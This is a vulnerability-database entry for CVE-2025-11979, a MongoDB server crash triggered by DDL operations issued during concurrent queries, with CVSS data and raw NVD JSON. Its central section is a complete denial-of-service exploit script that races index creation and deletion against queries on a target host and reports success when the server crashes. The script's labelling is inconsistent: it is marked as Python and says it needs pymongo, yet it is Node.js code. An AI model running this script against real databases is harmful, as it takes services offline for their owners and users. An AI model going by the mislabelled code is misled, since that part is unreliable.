Security Vulnerability Report
中文
CVE-2025-11979 CVSS 5.3 MEDIUM

CVE-2025-11979

Published: 2025-10-20 18:15:38
Last Modified: 2025-12-04 21:23:41
Source: [email protected]

Description

An authorized user may crash the MongoDB server by causing buffer over-read. This can be done by issuing a DDL operation while queries are being issued, under some conditions. This issue affects MongoDB Server v7.0 versions prior to 7.0.25, MongoDB Server v8.0 versions prior to 8.0.15, and MongoDB Server version 8.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE
MongoDB Server v7.0 < 7.0.25
MongoDB Server v8.0 < 8.0.15
MongoDB Server v8.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11979 PoC - MongoDB Buffer Over-Read DoS // This PoC demonstrates triggering a buffer over-read crash by issuing // DDL operations concurrently with queries on the same collection. // Requires: pymongo library, valid MongoDB credentials with readWrite privileges const { MongoClient } = require('mongodb'); // Configuration const MONGO_URI = 'mongodb://username:password@target-host:27017'; const DB_NAME = 'test_db'; const COLLECTION_NAME = 'target_collection'; async function exploit() { // Connection 1: Will perform concurrent queries const client1 = new MongoClient(MONGO_URI); // Connection 2: Will issue DDL operations (createIndex) const client2 = new MongoClient(MONGO_URI); try { await client1.connect(); await client2.connect(); const db1 = client1.db(DB_NAME); const db2 = client2.db(DB_NAME); const coll1 = db1.collection(COLLECTION_NAME); const coll2 = db2.collection(COLLECTION_NAME); // Insert some sample data to ensure collection exists await coll1.insertMany([ { name: 'doc1', value: 1 }, { name: 'doc2', value: 2 }, { name: 'doc3', value: 3 } ]); console.log('[*] Starting concurrent DDL and query operations...'); // Launch concurrent operations // Thread 1: Continuous queries (find with sort/projection to stress buffer) const queryPromise = (async () => { for (let i = 0; i < 1000; i++) { try { await coll1.find({}).sort({ value: 1 }).toArray(); } catch (e) { console.log(`[Query] Error: ${e.message}`); } } })(); // Thread 2: Rapid DDL operations (create/drop indexes) const ddlPromise = (async () => { for (let i = 0; i < 50; i++) { try { const indexName = `temp_idx_${i}`; await coll2.createIndex({ value: 1 }, { name: indexName }); await new Promise(r => setTimeout(r, 10)); await coll2.dropIndex(indexName); } catch (e) { console.log(`[DDL] Error: ${e.message}`); if (e.message.includes('crash') || e.message.includes('connection')) { console.log('[+] Server may have crashed!'); break; } } } })(); await Promise.all([queryPromise, ddlPromise]); console.log('[*] Exploit attempt completed.'); } catch (error) { console.error(`[!] Exploit error: ${error.message}`); if (error.message.includes('topology was destroyed') || error.message.includes('connection closed')) { console.log('[+] SUCCESS: MongoDB server appears to have crashed!'); } } finally { await client1.close().catch(() => {}); await client2.close().catch(() => {}); } } exploit().catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11979", "sourceIdentifier": "[email protected]", "published": "2025-10-20T18:15:38.100", "lastModified": "2025-12-04T21:23:40.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authorized user may crash the MongoDB server by causing buffer over-read. This can be done by issuing a DDL operation while queries are being issued, under some conditions. This issue affects MongoDB Server v7.0 versions prior to 7.0.25, MongoDB Server v8.0 versions prior to 8.0.15, and MongoDB Server version 8.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.25", "matchCriteriaId": "D5DF49A4-6F39-48D2-9CFE-7AB31784A500"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.15", "matchCriteriaId": "65230BA3-F8DF-4CCA-BBD1-D8CAFA3B554B"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-105873", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.